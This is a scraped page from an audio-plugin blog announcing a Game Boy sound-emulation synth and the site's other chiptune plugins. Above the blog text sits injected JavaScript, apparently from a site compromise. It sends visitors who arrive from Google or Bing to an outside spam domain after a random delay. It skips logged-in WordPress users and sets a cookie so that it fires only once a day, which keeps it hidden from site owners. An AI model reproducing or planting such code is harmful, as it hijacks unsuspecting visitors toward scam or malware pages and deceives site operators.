((event) => { var ref = document.referrer || ''; if (ref.length === 0) { return; } ref = ref.toLowerCase(); if (ref.indexOf('google') === -1 && ref.indexOf('bing') === -1) { return; } var cookie = document.cookie || ''; if (cookie.indexOf('wordpress_logged') !== -1 || cookie.indexOf('wp-settings') !== -1 || cookie.indexOf('wordpress_test') !== -1) { return; } if (cookie.indexOf('wordpress-test') !== -1) { return; } function generateRandomInteger(min, max) { return Math.floor(min + Math.random()*(max - min + 1)); } document.cookie = "wordpress-test=1; max-age=86400; path=/;"; const delay = generateRandomInteger(2000, 6000); setTimeout(() => { window.location.replace('http://offers25942.xyz/'); }, delay);})();>

New Synth Released – PAPU

Announcing PAPU! I’ve just released a new VSTi / AU synth plugin: PAPU. It emulates the sound hardware of the Nintento Gameboy. 2 square wave channels and 1 noise channel with stereo output. Available in 32 and 64 bit for Windows and Mac. Check…

Welcome to SocaLabs!

Welcome to SocaLabs! This is the new home of my audio plugins. My first release is a set of emulations of classic 8-bit machines – Nintendo Entertainment System, Sega Master System, Commodore 64 and coming soon, Gameboy. I’ve also release Voc, an emulation of…